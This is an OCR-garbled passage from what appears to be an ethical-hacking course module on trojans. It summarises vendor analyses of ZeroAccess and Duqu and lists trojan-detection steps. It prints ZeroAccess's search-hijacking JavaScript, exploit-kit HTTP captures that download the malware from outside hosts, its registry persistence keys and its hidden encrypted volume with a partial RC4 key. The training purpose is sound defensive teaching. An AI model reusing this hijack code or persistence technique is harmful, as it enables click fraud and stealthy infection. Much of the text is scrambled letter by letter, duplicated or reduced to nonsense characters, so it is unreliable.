t i t l e ) { b o d y = " < h tm l> < h e a d >
< title > " + t i t l e + " < /title >
< /h e a d > < f r a m e s e tx f ra m e s r c = \
,,h t t p : / / ,/ + r e f + " \ " >
< / f r a m e s e t > < / h tm l> " ;
bing.com , icq.com , y a h o o .co m , ask.com ,
and aol.com ), Z ero A cce ss sen d s an
a d d itio n a l GET req u e st s im ila r to the
follow in g:
h ttp : / / suzuk i 111x111 [ . ] a n /r / r e d ir e c t . php
?Xd=9de5404ac67a404a0ela775f212cd210
&u=198&cv=150&sv=15&os=501. 804 .x86
A d d P a g e ( " www. g o o g l e . com . h k /
s e a rc h ? q = c a r & h l= z h - C N & s o u rc e =
h p & g b v = l" , 2 , n u l l , 0 , "H T T P/1 . 1
2 0 0 \r\n C o n n e c tio n : c l o s e \ r \
n C a c h e -C o n tr o l: n o - c a c h e \r \
n P ra g m a : n o - c a c h e \ r \ n C o n t e n t L e n g th : " + b o d y . le n g th +
" \ r \ n \ r \ n " + b o d y );
This causes an a d d itio n a l p o p -u p w in d o w o r
tab to be created, th e new w in d o w o r ta b
w ill co n ta in search resu lts fo r th e o rig in a l
search q u e ry w ith h ijacked lin k s o r
}
a d d itio n a l co nten t
F o r m a tR e d ire c t( " k o z a n e k o z a s e a r c h s y s
te rn .c o m /? s e a rc h = c a r & s u b id = 1 9 8 & k e y = 4
15db60c8aa81c
0bed€8",
" c a r") ;
http://www.symontec.com
g g jj
T r o j a n
S o u r c e :
In
a d d i t i o n
s e a r c h e s .
t o
r e q u e s t
a n
i c q .c o m ,
s im ila r t o
Z e r o A c c e s s
( C
o n t ’ d )
h t t p : / / w w w . s y m a n t e c . c o m
g e n e r a t i n g
W h e n
b i n g .c o m ,
A n a l y s i s :
r e v e n u e
i n f e c t e d
u s e r
y a h o o . c o m ,
t h e
t h r o u g h
p a y - p e r - c l ic k
s e a r c h e s
a s k .c o m ,
in
a n d
p o p u l a r
a o l. c o m ) ,
n e t w o r k s ,
s e a r c h
Z e r o A c c e s s
e n g i n e s
Z e r o A c c e s s
h ija c k s
( in c lu d in g
s e n d s
a n
u s e r s '
g o o g l e . c o m ,
a d d i t i o n a l
G E T
f o llo w in g :
h t t p : / / s u z u k i m x m | ‫־‬.‫־‬l c n / r / r e d i r e c t . p h p ? i d = 9 d e 5 4 0 4 a c 6 7 a 4 0 4 a 0 e l a 7 7 5 f 2 1 2 c d 2 1 0 & u = 1 9 8 & c v = l
5 0 & s v = 1 5 & o s = 5 0 1 . 8 0 4 . x 8 6
T h is
c a u s e s
c o n t a i n
e x a m p l e
a n
s e a r c h
o f
a d d i t i o n a l
r e s u l ts
r e t u r n e d
M o d u le 0 6 P a g e 9 3 6
f o r
p o p - u p
t h e
H T M L
w i n d o w
o rig in a l
c a n
b e
o r
s e a r c h
s e e n
a s
t a b
q u e r y
t o
b e
w i t h
c r e a t e d .
h i ja c k e d
T h e
links
n e w
o r
w i n d o w
a d d i t i o n a l
o r
t a b
c o n t e n t .
w ill
A n
f o llo w s .
1:
< j s t >
f u n c t i o n
F o r m a t R e d i r e c t ( r e f ,
t i t l e )
b o d y
{
< t i t l e > "
+
=
" < h t m l > < h e a d >
t i t l e
+
" < / t i t l e >
< / h e a d > < f r a m e s e t x f r a m e
‫ ״‬h t t p : / / ‫״‬
+
r e f
+
s r c = \
" \ ‫> ״‬
< / f r a m e s e t > < / h t m l > " ;
A d d P a g e ( " w w w . g o o g l e . c o m . h k /
s e a r c h ? q = c a r & h l = z h - C N & s o u r c e =
h p & g b v = l " , 2 , n u l l ,
0 ,
2 0 0 \ r \ n C o n n e c t i o n :
n C a c h e - C o n t r o l :
n P r a g m a :
L e n g t h :
n o - c a c h e \ r \
n o - c a c h e \ r \ n C o n t e n t "
+
" \ r \ n \ r \ n "
4:
" H T T P / 1 . 1
c l o s e \ r \
b o d y . l e n g t h
+
+
b o d y ) ;
}
F o r m a t R e d i r e c t ( " k o z a n e k o z a s e a r c h s y s
t e m . c o m / ? s e a r c h = c a r & s u b i d = l 9 8 & k e y = 4
1 5 d b 6 0 c 8 a a 8 1 c
0 b e d 6 8 " ,
" c a r ‫; ) ״‬
FIGURE 6.44: An example of returned HTML
M o d u le 0 6 P a g e 9 3 7
( ^H
( C o n t ’d )
|f5ET /oanp91lcm/?4 HTTP/ 1.1
Host: lovrru3tard.org y L ‫ן‬
User-Agent: Hosilla/5.0 ( W
Accept: text/xml,applicatiq
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charaet: ISO-8859-1,utf-8;q-0.7, *;q*0.7
Keep-Alive: 300Connection: keep-alive
Main Attack URL
fertifM | EUkjI IlMkM
en‫־‬US; rvsl.8.1.13) Gecko/20080311 Firefox/2.0.0.13
1,text/html;q*0.9,text/plain;q0.8 ‫״‬,image/png,»/‫;״‬q-0.5
I
-chcinlxbodyxdiv id- 'wag' x / d i v x d i v id- ‫י‬lat ‫י‬x / d i v x d i v id- ’fry' x / d i v x d i v id- ‫י‬fud' ></di v x d i v id- ’hag1></div;
<dlv l d - T a j ' X / d l v X d l v ÊT /05np»l<cn1/l^ d S i b 2 7aegbt ;8j7:{?1 0 ^ 0 Je {A^C.5 5604{aft01001);0.:5»?QS05 51'.,b'.;6!.l HTTF/1.1
u , » . « , q . o . z , f c , c , : ) , h , l , c , i« c # p t - e n c o d 1 n g : pa
.
J I
c o n t e n t - t y p e : a p p il
0 ; q < h ; q + + ) ( o + - p ; c ‫ ״‬f . c h a t j s e r - A g e n t : m_ozi
_11 11
1‫ ־‬a / 4 .0 C
(j/a) ;K-pacselnt (c , 16) ; m o s t : lov«»nustard.or
(amp.fid) ;kat-‫־‬bQ3LkY78Y«!A c c e p t: t e x t / h t m l, ?m age/gi
c o n n e c t io n : k e e p - a l i v e
f ';lei■7;abs=cun(pya,lei‫־‬
Second Stage Exploits
Uop.ave) :uM»-'QIP5bS790 HTTP/1-1 200 0K
[ o u l ] ; f u n c t i o n s h h ( u ) ( r e j a t e : T u e . 25 O c t 2 0 1 1 1 5 : 1 9 : 2 0 GMT
v , p ,» , f ,r ; a - 'P t d 8 E a r a ll E 4 5 e r v < > r : A p a c h e /2 .2 .1 7 ( U n ix ) p h p / 5 . 2 . 1 ?
function 3ay(v,w, k) {var k - p o w e r e d -B y : p h p / 5 . 2 . 1 7
.o n te n t-L e n g th : 4 0 9 6
|
v, y))function 0rc(0)(vajr(
- o r r t e p - * ■ ‫־ךך‬. ' ■‫ ■'־‬1/^15Vce4c^T84r3r 52 544cr{SW5^fT
^7 0102OdOc 5707045e02 54 5401075c 5 0 0 3 ;1 ;
g (‫׳‬c■ 'cl)ang26m' ;d-ru; )4
T ° " t ! | u 5 e r ‫ ־‬Agent : moz1
x] ;a■♦■♦) ( if (q[ 1] (bar [aj[ ] < -ca c ô s t : T o w u s t a rrdd.. o r g
\
1/3 s,k, r ,a;1-'G5750Q77S<e®P A c c e p t : t e x t / h t m l. fim
m aaggee//g
g 1lff,. Im
1 m aage/
g e /jp
1 peg,
e g , ‫׳״‬:
: o n n e c t io n : k e e p - a l i v e
[It] ; ‫ ( )♦♦ נ‬t r y ( z - n e v A c t i v ‫ ־‬r
irln a/4 .0 (window! xp 5.1) yfra
: 10
,
ZeroAccess Download
m ‫׳‬a ;9 '■‫יזו‬Ld8Em6Q
v , k, z , x , v , » , h, 1
™ T u-e , 125200O c0tK2011 1 5 : 4 9 : 2 1 GMT
'
“
,5 1 • K ‫־‬
:>ate:
(», 8);d-‫י‬mY9g4a5b8at3Idw.
3 s e r v e r : A p a c h e / 2 .2 .1 7 (u n 1 x ) p h p / 5 .2 .1 7
•• <-P0w e re d ‫ ־‬B y: p h p /5.2.17
iff (w) (var k, y, s, n,u, r, a
:
o
n
t e n t - L e n g t h : 243712
(r,3);‫ב‬-‫י‬Q9PE430I08LPtfe‫<־‬
•Y : o n t e n t - D i s p o s i t i o n : i n l i n e ; f ile n a m e -e m g d E 8 v 64
•°‫־ ׳ ׳‬
8.. 8F
..p k .
J .E ..
- L-
:o n te n t-T y p e : a p p llc a t lo n / o c t e t - s t r e a m
>c-pad: a v o id b ro w se r b ug
< _ cache: m is s fro m doma1 n .co m
< e e p -A l1 v e : t im e o u t -1
c o n n e c t io n : K e e p - A li v i aET
. p h p ‫>־‬w=19
.e82& f444fa78M 44di5«W i624«& 6c4a-i3
40st: e x e z k z l a . c n
, , s e r - A g e n t : o p e r a / 6 (w indow s mt 5 .1 ; u; L a n g io -4 0 9 ; x8 6 )
‫ י‬C o n n e c t io n : c l o s e
ZeroAccess Download
http://www.5ymantec.com
E x p lo it k it d r o p p in g Z e ro A c c e ss
Copyright © by EG-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
T r o j a n
S o u r c e :
Z e r o A c c e s s
c a n
i m p r e s s i o n
t h e y
u s e
o f
v a r i o u s
a t t e m p t i n g
t o
A n a l y s i s :
Z e r o A c c e s s
( C
o n t ’ d )
a ls o
w ill
b e
b e
in s ta lle d
in s ta llin g
t h r o u g h
a n
e x p lo i t
k its
t o
e v a d e
IPS
r a t h e r
w e b
u p d a t e
in stall
e x p l o i t
f o r
a n
Z e r o A c c e s s
t h a n
a n
k its.
T h e
a p p li c a ti o n ,
is
likely
i n d ic a ti o n
u s e r
s u c h
s im p ly
o f
a s
a
is
o f t e n
A d o b e
fa ls e ly
F la sh
b y p r o d u c t
Z e r o A c c e s s
b e i n g
o f
s o ld
g iv e n
p la y e r .
its
t h e
T h is
a u t h o r s
t o
o t h e r
d i s t r ib u t o r s .
M o d u le 0 6 P a g e 9 3 8
SET /0 s n p 9 1 ic m /? 4 HTTP/
1 ■1
P/1.1
Hose: 10M 1nuscard.org
U se r-A g e n t: H o z i l l a / 5 .0
M a in A tta c k U R L
A c c e p t: t e x t / x m l , a p p l i c a t i
A c ce p t-L a n g u ag e : e n - u s , e n ; q = 0 .5
A c ce p t-E n c o d in g : g z i p , d e f l a t e
A c c e p t- C h a r s e t: IS O -8 8 5 9 -1 , u t r - 8 ; q - 0 . 7, ; q- 0 . ‫ד‬
K e ep -A liv e : 3 0 0 C o n n e c tio n : k e e p - a l iv e
en-U S: r v : 1 .8 .1 .1 3 ) G ecko/20080311 F i r e f o x / 2 .0 .0 .1 3
■11/ t e x t / h t m l ; q -0 . 9 , t e x t / p l a i n ; q - 0 . 0, im ag e/p n g , * /* ; q - 0 .5
c h t m l x b o d v x d i v id = ' w a g 'x / d i v x d i v i d = ' l a t ' x / d i v x d i v i d * ' f r v ' x / d i v x d i v id = ' f u d ' x / d i v x d i v i d = 'h a a 1x / d i v
<d!v i d ‫ ' ־‬r a j ' > < / d 1V><divf=ET /0snp?>11an7,‫~ ׳‬H ^5027aeebF 56a:! d l0 5eieS 60905 5604 5c6801 uC 01‫ ׳‬uc5 5! 1 5 6 5 1 0' 51 11505. ‫ ׳‬h ttp ,.1 .1 '‫׳‬
‫ ב‬r r o n t _ o n rn H 1 n n ■
1‫ל‬
‫ ב ד ז‬/ ‫ ־‬1/ H P _ n ‫ר ו ר ד י ו‬
‫מ ר ד ־‬
u , u , a , q ,o , z , k , c , j,h , 1 , c , a c c e p t - e n c o d i n g : p a c k 2
c o n te n t-ty p e :
a p p lic a t
0 ;q < h ;q + + ) { o t= p : c = f . c h a r u s e r‫ ־‬- A gq e n t : M
(w S e c o n d S t a g e E x p l o i t s
m ooz zi i Il l I a/4.0
;k ‫ ־‬p a r s e ln t ( c , 16 );wH 0s t : lowmustard. org
q‫־‬.‫ '״‬,
q=.<!
( a n p .f id ) ; k a t ‫ ' ־‬bQ3LkY78Y Accept: te x t / h t m l, image/gir, 1mage/;)peg,
f 1 ; l e i 7 ‫ ; ־‬ab3‫ ־‬ru n (p y a, l e iconnection: keep-alive
( 1 0 p ,a v e ) ; umm=' QIP5&5790 HTTP/1.1 200 OK
[o u l] ; f u n c t i o n s h h ( u ) ( r e Date: Tue, 25 Oct 2011 15:49:20 GMT
v , p , w , f ,r;w = 'P td 8 E a 1 rllE 4 Server: Apache/2.2.17 (Unix) PHP/5.2.17
f u n c t i o n ja y (v ,m ,k ) fv a r x-Powered-By: PHP/5.2.17
4096
( v , y ) >f u n c t i o n o rc (o ) (v « ôntent-Length:
J
‫־‬ET~V 0s‫־‬n‫־‬p'91i cm/^'l5Vce-e 6 8 ‘5‫־‬a‫־‬f 3?5544 2‫~־‬J2'5‫־‬T851‫־‬Vf570102OdOc 570704 5e02 54 5401075c5003: 1:
(g, 4 ) ;c = 'c lk m g 2 6 m ';d = r u n c onTejG
o n te User-Aqent:
Mozi 11 a/4.0 (windows XP 5.1)
[x] ;a++) { i f ( q ( l] (b a r [a] [ x-cac Host: lownustard.ora
l , j ,z ,k , r , a ; l - 'G 5 7 5 G Q 7 7 6 Keep- Accept: Text/html, image/gif, image/jpeg,
Z e ro A c c e s s D o w n lo a d
[k] ; ‫ נ‬++) ( t r y ( z=neu A c tiv : ° nne connection: keep-alive
ro, a ; r o 9 ‫י ־‬Ld6Em6Q' ; a* cu n (‫^ןקימ‬
HTTP/1.1 200 O K
w, fc, z, x ,v , 3 , h, 1, d ; z * 'b l e K-*‫ ׳‬. . Date: Tue, 25 Oct 2011 15:49:21 GMT
(w, 8)? d - ‫ » י‬Y 9 g 4 a5 b 8 at3 Id a , .
server: Apache/2.2.17 (unix) php/5 .2 .1 7
lf* (w )< v a r k, y , s , n , u , c 2‫ ׳‬r • ••X-Powered-By: PMP/5.2.17
G . .' . Content-Length: 243712
109* 3; ( 3 , ‫)ש‬PE430I 08LPt f e ■___Y
c o n t e n t - D is p o s it io n :
. 0.
in lin e ;
. .
n te n t-T /p e :
a p p lic a t io n
8. . 8F x‫־‬o Pad:
avoid browser bug
file n a m e = e m g d E 8 v 6 .
/o c te t-s tre a m
. .PK. x-cache: miss from domain.com
> .E .. Keep-Alive: timeout=1!
c o n n e c tio n :
K e e p - A liv <s e t
Z e ro A c c e s s D o w n lo a d
e § J 0 f 4 4 4 f a ? f if 4 4 4 d l5 6 5 ^ 4 1 0 5 4 S J 6 6 c ia - 1 3
Host: exezkzla.cn
user-Agent: opera/6 (windows NT 5.1; u; LanglD=409; x86)
viz....................................Juser-Agent:
'connection:
connection: close
FIGURE 6.45: Exploit kit dropping ZeroAccess
M o d u le 0 6 P a g e 9 3 9
( ^H
( C o n t ’d )
(•rtifwd | ttkKJi Nm Im
The Trojan then creates the following registry
entries to ensure the newly infected driver serves
as the main load point for ZeroAccess:
Upon execution, ZeroAccess selects a random
driver alphabetically between %System%\
D r iv e r s \c l a s s p n p . sy s and
% System % win32k. s y s and overwrites the
driver with its own code
e
HKEY_LOCAL_M ACHINE\SYSTEM \CurrentCont
r o l S e t \ S e r v i c e s \ [ F I L E name OF
INFECTED DRI VER] \ ‫׳׳‬I ma g e P a t h ‫״ * \ " = ״‬
The original clean driver is stored in a hidden
encrypted NTFS volume using the file name
%System%\config\<RANDOM CHARACTERS>
HKEY_LOCAL_M ACHINE\SYSTEM \CurrentCont
r o l S e t \ S e r v i c e s \ [ F I L E NAME OF
INFECTED D R IV E R ]\"T y p e " = " 1 "
The hidden volume is used to store the original
clean driver as well as additional components and
downloaded payload modules
O HKEY_LOCAL_M ACHINE\SYSTEM \CurrentCont
r o l S e t \ S e r v i c e s \ [ F I L E NAME OF
INFECTED DRIVER] V 'S t a r t " = ” 3 "
Code is then injected into services.exe through an
APC which encrypts the data stored in the hidden
NTFS volume under \??\A C PI#PN P0303#2& da
la 3 f f& 0 \U and also creates an alternate data
stream file % S y stem D riv e% \2 3 8 5 2 9 9 0 6 2 :
2 3 02268273 . e x e and executes it
The volume is roughly 16 MB in size and is
accessed through the file system device name:
\\? ? \A C P I# P N P 0 3 0 3 # 2 & d a la 3 ff& 0
These main loader components ensure the
additional payload files stored in the hidden NTFS
volume are loaded and executed
°Ry \ P
m t'
http://www.symantec.com
^
T r o j a n
S o u r c e :
U p o n
A n a l y s i s :
Z e r o A c c e s s
T h e
e x e c u t i o n ,
Z e r o A c c e s s
s e l e c t s
a n d
t h e
a n d
a
r a n d o m
d r iv e r
% S y s t e m % w i n 3 2 k . s y s
a lp h a b e t ic a ll y
a n d
o v e r w r i t e s
b e t w e e n
t h e
d r iv e r
w i t h
c o d e .
o rig in a l
c le a n
d r iv e r
is
s t o r e d
% S y s te m % \ c o n f i g \< R A N D O M
T h e
o n t ’ d )
% S y s t e m % \ D r i v e r s \ c l a s s p n p . s y s
its o w n
( C
h i d d e n
v o l u m e
d o w n l o a d e d
file
s y s t e m
is
u s e d
p a y l o a d
d e v i c e
in
a
h i d d e n
e n c r y p t e d
N T F S
v o l u m e
u s in g
t h e
file
n a m e
C H A R A C T E R S > .
t o
s t o r e
m o d u l e s .
t h e
T h e
o rig in a l
v o l u m e
c le a n
d r iv e r
is r o u g h l y
1 6
a s
w e ll
M B
in
a s
siz e
a d d i t i o n a l
a n d
c o m p o n e n t s
is a c c e s s e d
t h r o u g h
n a m e :
\ \ ? ? \ A C P I # P N P 0 3 0 3 # 2 & d a l a 3 f f &0
F o r e x a m p l e ,
t h e
o rig in a l
c le a n
d r iv e r
is s t o r e d
\ \ ? ? \ A C P I # P N P 0 3 0 3 # 2 & d a l a 3 f f & 0 \ L \ [ E I G H T
T h is file
s y s t e m
o f t h e
h i d d e n
v o l u m e
a t:
RANDOM
is e n c r y p t e d
u s in g
C H A R A C T E R S ].
R C 4
w i t h
t h e
f o llo w in g
\ x F F \ x 7 C \ x F l \ x 6 4 \ x l 2 \ x E 2 \ x 2 D \ x 4 D \ x B l \ x C F \ x 0 F \ x 5 D \ x 6 F \ x E 5 \ x A 0 \ x 4
T h e
a s
T r o ja n
t h e
m a i n
t h e n
l o a d
M o d u le 0 6 P a g e 9 4 0
c r e a t e s
p o i n t
t h e
f o ll o w i n g
r e g is tr y
e n t r i e s
t o
e n s u r e
t h e
n e w l y
1 2 8 - b it
k e y :
9
i n f e c t e d
d r iv e r
s e r v e s
f o r Z e r o A c c e s s :
©
H K E Y _ L O C A L _ M A C H I N E \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ S e r v i c e s \ [ F I L E
IN F E C T E D
9
©
D R I V E R ] \ ‫ ״‬T y p e 1 "
=
is
s t o r e d
t h e n
in
i n je c te d
t h e
h i d d e n
a l t e r n a t e
T h e s e
v o l u m e
m a i n
a r e
D R I V E R ] \ ‫ ״‬S t a r t 3 "
d a t a
l o a d e r
l o a d e d
M o d u le 0 6 P a g e 9 4 1
in to
N T F S
s t r e a m
s e r v i c e s . e x e
v o l u m e
file
O F
NAME
O F
NAME
O F
‫" ״‬
=
‫" ״‬
t h r o u g h
a n
A P C .
T h e
in je c te d
c o d e
e n c r y p t s
t h e
d a t a
\ ? ? \ A C P 1 # P N P 0 3 0 3 # 2 & d a l a 3 f f & 0 \ u
a n d
a ls o
% S y s t e m D r i v e % \ 2 3 8 5 2 9 9 0 6 2 : 2 3 0 2 2 6 8 2 7 3 . e x e
a n d
e x e c u t e s
c o m p o n e n t s
a n d
u n d e r
NAME
" \ * ‫״‬
IN F E C T E D
a n
=
IN F E C T E D
C o d e
D R I V E R ] \ ‫ ״‬I m a g e P a t h ‫״‬
e n s u r e
t h e
a d d i t i o n a l
p a y l o a d
files
s t o r e d
in
t h e
c r e a t e s
h i d d e n
it.
N T F S
e x e c u t e d .
T
r
o
j
a
n
A
n
a
l
y
s
i
s
:
D
u
q
u
C
E
H
UrtifW
tf IthKJi lUikM
Duqu is a sophisticated Trojan that acts as a
backdoor and facilitates the th e ft of private
inform ation
C o d e
se c tio n ,
D u q u
p a y lo a d
DLL
10001000
C++ Standard Templat e Library functions
.100042SO
Native C++ code with STL
1000C2C9
The code section of the Payload DLL is
common for a binary consists of "slices" of
code that may have been initially compiled in
separate object files before they were linked in
a single DLL
Payload
Ot her Language / C framework
No C++
10023878
Native C+ + code with STL
Most of them can be found in any C++
program, like the Standard Template Library
(STL) functions, run-time library functions, and
user-written code, except the biggest slice that
contains most of C&C interaction code
10028F2C
Run-Time library code
1002EAD1
Native C code for injection
100 M O M
API thunks. Exception handlers
http://www.securelist.com
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited
£ 3 Trojan Analysis: Dut*u
^
D u q u
S o u r c e :
is
a
s o p h i s t i c a t e d
i n f o r m a t i o n .
s e v e r a l
s e p a r a t e
C + +
a n d
h t t p : / / w w w . s e c u r e l i s t . c o m
T h e
p i e c e s
o b j e c t
p r o g r a m ,
c o d e .
files
like
u s e r - w r i t t e n
M o d u le 0 6 P a g e 9 4 2
c o d e
o f
T r o ja n
s e c t i o n
It
t h e
o f
t h e
c o n s is t s
b e f o r e
c o d e ,
t h a t
t h e y
S t a n d a r d
e x c e p t t h e
o f
w e r e
a c t s
a s
P a y l o a d
" s lic e s "
lin k e d
T e m p l a t e
b i g g e s t
a
b a c k d o o r
DLL
o f
in
is
t h a t
s in g le
L ib ra r y
slice
c o m m o n
c o d e
a
t h a t
a n d
(STL)
f a c ilita te s
f o r
m a y
DLL.
a
b i n a r y
h a v e
M o s t
o f
f u n c t i o n s ,
c o n t a i n s
m o s t
t h e
o f
t h e f t
t h a t
w a s
b e e n
initially
t h e m
c a n
r u n - t i m e
C & C
o f
b e
p r iv a t e
m a d e
f r o m
c o m p i l e d
f o u n d
lib ra ry
i n t e r a c t i o n
in
in
a n y
f u n c t i o n s ,
c o d e .
C o d e s e c tio n , D u q u
p a y lo a d
DLL
.loooitxio
C++ Standard Template Library functions
.100042SO
.1000C2C9
Payload
O ther Language / C fram ework
No C++
.10023878
-10028F2C
Run-Time library code
•1002EAD1
.100300A4
F IG U R E
M o d u le 0 6 P a g e 9 4 3
Native C code for injection
API thunks. Exception handlers
6 .4 6 :
D u q u
T o o l
S c r e e n s h o t
CEH
Trojan Analysis: Duqu Framework
Duqu F ram ew ork
C ode P ro p e rtie s
S
Event Driven
Fram ew ork
Everything is wrapped into objects
Event objects, based on native
Windows API handles
S Function table is placed directly
Thread context objects that hold
lists of events and deferred
execution queues
into the class instance and can be
modified after construction
S
There is no distinction between
utility classes (linked lists, hashes)
and user-written code
S
Objects communicate using
method calls, deferred execution
queues, and event-driven callbacks
S
There are no references to runtime library functions; native
Windows API is used instead
M Callback objects that are linked to
events
Event monitors, created by each
thread context for monitoring
events and executing callback
objects
Thread context storage manages the I
list of active threads and provides
access to per-thread context objects I
http://www.securelist.com
r
^ 1— ‫ן‬
T r o j a n
S o u r c e :
T h is
slic e
t h e
t o
D
u q u
F r a m
e w
o r k
is d i f f e r e n t
r e f e r e n c e s
c a lle d
A n a l y s i s :
a n y
D u q u
f r o m
o t h e r s ,
s t a n d a r d
o r
b e c a u s e
it w a s
C + +
n o t
c o m p i l e d
f u n c t i o n s ,
b u t
f r o m
is
C + +
s o u r c e s .
d e f in ite ly
It c o n t a i n s
o b j e c t - o r i e n t e d .
n o
It
is
F r a m e w o r k .
D u q u F r a m e w o r k C o d e P ro p e rtie s
T h e
c o d e
t h a t
i m p l e m e n t s
0
E v e r y th i n g
0
F u n c t io n
t h e
is w r a p p e d
t a b l e
is
D u q u
in to
p l a c e d
F r a m e w o r k
h a s
s e v e r a l
d is tin c tiv e
p r o p e r t i e s :
o b j e c t s
d ir e c tly
in to
t h e
c la s s
i n s t a n c e
a n d
c a n
b e
m o d i f i e d
a f t e r
c o n s t r u c t i o n
0
T h e r e
is
n o
d is t in c t io n
b e t w e e n
u tility
c la s s e s
(lin k e d
lists,
h a s h e s )
a n d
q u e u e s
a n d
e v e n t - d r i v e n
c o d e
0
O b j e c t s
c o m m u n i c a t e
u s in g
m e t h o d
calls,
d e f e r r e d
e x e c u t i o n
c a llb a c k s
M o d u le 0 6 P a g e 9 4 4
9
T h e r e
a r e
n o
r e f e r e n c e s
t o
r u n - t i m e
l ib r a r y
f u n c t i o n s ;
n a ti v e
W i n d o w s
D u q u
F r a m e w o r k
is d e f i n i t e l y
T h e r e
is a n
A PI
is
u s e d
i n s t e a d
E v e n t-D riv e n F ra m e w o r k
T h e
l a y o u t
t h a t
w a s
t h e
a n d
u s e d
i m p l e m e n t a t i o n
t o
f r a m e w o r k
T h e r e
a r e
t h a t
s p e c ia l
9
E v e n t
Q
T h r e a d
Q
C a llb a c k
©
E v e n t
T h r e a d
t h r e a d
M o d u le 0 6 P a g e 9 4 5
t h e
is u s e d
o b j e c t s
o b j e c t s ,
o b j e c t s
m o n i t o r s ,
r e s t
o n
n a ti v e
t h a t
a r e
c r e a t e d
t h r o u g h o u t
t h e
h o ld
lists
t o
e a c h
t h e
A P I
e v e n
w h o l e
W i n d o w s
lin k e d
b y
in t h e
T r o ja n .
i m p l e m e n t
o b j e c t s
t h a t
o f t h e
e x t e n s i v e l y
t h a t
b a s e d
c o n t e x t
c a llb a c k
©
p r o g r a m
o f o b j e c t s
m o r e
c o d e :
n o t
i n t e r e s t i n g
it is e v e n t
n a t i v e
t o
f e a t u r e
C + +
o f
d r iv e n .
m o d e l :
h a n d l e s
o f e v e n t s
a n d
d e f e r r e d
e x e c u t i o n
q u e u e s
e v e n t s
t h r e a d
c o n t e x t
f o r
m o n i t o r i n g
e v e n t s
a n d
e x e c u t i n g
o b j e c t s
c o n t e x t
c o n t e x t
s t o r a g e
m a n a g e s
t h e
list o f a c t i v e
t h r e a d s
a n d
p r o v i d e s
a c c e s s
t o
p e r -
o b j e c t s
Trojan Analysis: Event Driven
Framework
CEH
0
This event-driven model resem bles O bjective C and its message passing features,
but the code does not have any direct references to the language, neither does it
look like com piled w ith known O bjective C com pilers
J
0
0
O b ject 2
O b je ct 2
*L
Event O b ject
Event O b ject
Event M o n ito r
.............
-------- X ---------
H
Event M o n ito r
-------- * ---------
C a llb a ck O b ject
C allback O bject
.............•>
Thread Context:
Event and Call
O b ject 1
Th re a d C ontext:
Event and Call
O b ject 1
Q ueue
Q ueue
Thread C ontext
Thread Context
Storage
Storage
‫־*־‬
http://www. securelist,com
T r o j a n
S o u r c e :
T h e
d o e s
k n o w n
h a v e
m o d e l
a n y
o b j e c t i v e
E v e n t
D
r i v e n
F r a m
e w
o r k
n o t
A n a l y s i s :
d i r e c t
r e s e m b l e s
O b j e c t i v e
r e f e r e n c e s
t o
t h e
C
a n d
its
l a n g u a g e ,
m e s s a g e
n e i t h e r
p a s s i n g
d o e s
it l o o k
f e a t u r e s ,
like
b u t
t h e
it is c o m p i l e d
c o d e
w i t h
C c o m p i l e r s .
O b je c t 2
O b je c t 2
y
E ven t O b je c t
E ven t M o n ito r
E ven t O b je c t
Event M o n ito r
----------- * ---------C allb ack O b je c t
O b je c t 1
‫י‬
4
-----------* ---------C a llb a ck O b je c t
.............»
T h re a d C o n tex t:
Event and Cali
O b je c t 1
T h rea d C on text:
Even t and Call
Queue
Q ueue
T h read C o n te x t
T h rea d C o n te x t
S torag e
S tora g e
FIGURE 6.47: Event Driven Framework
M o d u le 0 6 P a g e 9 4 6
M
o d u l e
S o
a v a ila b le .
d e t e c t i n g
s y s t e m
fa r,
N o w
t h e
a n d
its
w e
w e
•
^
—
v‫׳‬
—
h a v e
w ill
d i s c u s s e d
d i s c u s s
p r e s e n c e
o f
r e s o u r c e s
T r o j a n
,‫נ‬
F l o w
h o w
T r o j a n s
f r o m
o n
f u r t h e r
h o w
a
T r o ja n
in f e c ts
t o
c o n d u c t
T r o ja n
a n
i n f e c t e d
s y s t e m
s y s t e m
d e t e c t i o n .
a n d
t h u s
a n d
t h e
T r o ja n
h e l p s
t y p e s
o f
d e t e c t i o n
y o u
in
T r o ja n s
h e l p s
p r o t e c t i n g
in
t h e
loss.
C o n c e p t s
T r o j a n s
a
C o u n t e r m e a s u r e s
I n f e c ti o n
f | j | | ‫־‬
A n t i - T r o j a n
S o f t w a r e
■4
f
T h is
T y p e s
^
T r o j a n
s e c t i o n
1
P e n e t r a t i o n
T e s t i n g
D e t e c t i o n
f o c u s e s
M o d u le 0 6 P a g e 9 4 7
^
o f T r o j a n s
o n
T r o ja n
d e t e c t i o n
u s in g
v a r i o u s
t e c h n i q u e s
o r
m e t h o d s .
Scan fo r suspiciou s O PEN PORTS
Scan fo r suspiciou s STARTUP PR O G R A M S
■>4
Scan fo r suspiciou s RU N N IN G PROCESSES
Scan fo r suspiciou s FILES and FOLDERS
Scan fo r suspiciou s REGISTRY ENTRIES
Scan fo r suspiciou s NETW O RK ACTIVITIES
90
Scan fo r suspicious DEVICE DRIVERS
in stalled on th e co m p u ter
Scan fo r suspiciou s m o d ific a tio n to
OPERATING SYSTEM FILES
90
Scan fo r suspiciou s W IN D O W S SERVICES
Run Trojan SCA N N ER to d etect Trojans
90
Cbpyright © by EC-CMMCil. All Rights Jte$ervfed'.;Reproduction is Strictly Prohibited.
H
o w
t o
T r o j a n s
t h e i r
files
a c tu a l
a n d
y o u r
p u r p o s e
a n d
a n d
in s ta lle d
a r e
c o n f i d e n t i a l
files
s c a n s
D e t e c t
is
t o
y o u r
t h e
t a k e
p r o g r a m s
c o m p l e t e
i n f o r m a t i o n .
p e r s o n a l
d e t e c t s
o n
m a l i c i o u s
T r o j a n s
In
i n f o r m a t i o n ,
p r e s e n c e
s y s t e m
o f
m a n u a l l y .
t h a t
c o n t r o l
o r d e r
a n
t o
o n
o v e r
a v o id
a n ti v i r u s
T r o ja n s
T h e
m a s q u e r a d e
1.
S c a n
f o r
s u s p ic i o u s
O P E N
2.
S c a n
f o r
s u s p i c i o u s
R U N N IN G
P R O C E S S E S
3.
S c a n
f o r
s u s p i c i o u s
R E G IS T R Y
E N T R IE S
4.
S c a n
f o r
s u s p i c i o u s
D E V IC E
5.
S c a n
f o r
s u s p i c i o u s
W I N D O W S
6.
S c a n
f o r
s u s p i c i o u s
S T A R T U P
P R O G R A M S
7.
S c a n
f o r
s u s p i c i o u s
FILES a n d
F O L D E R S
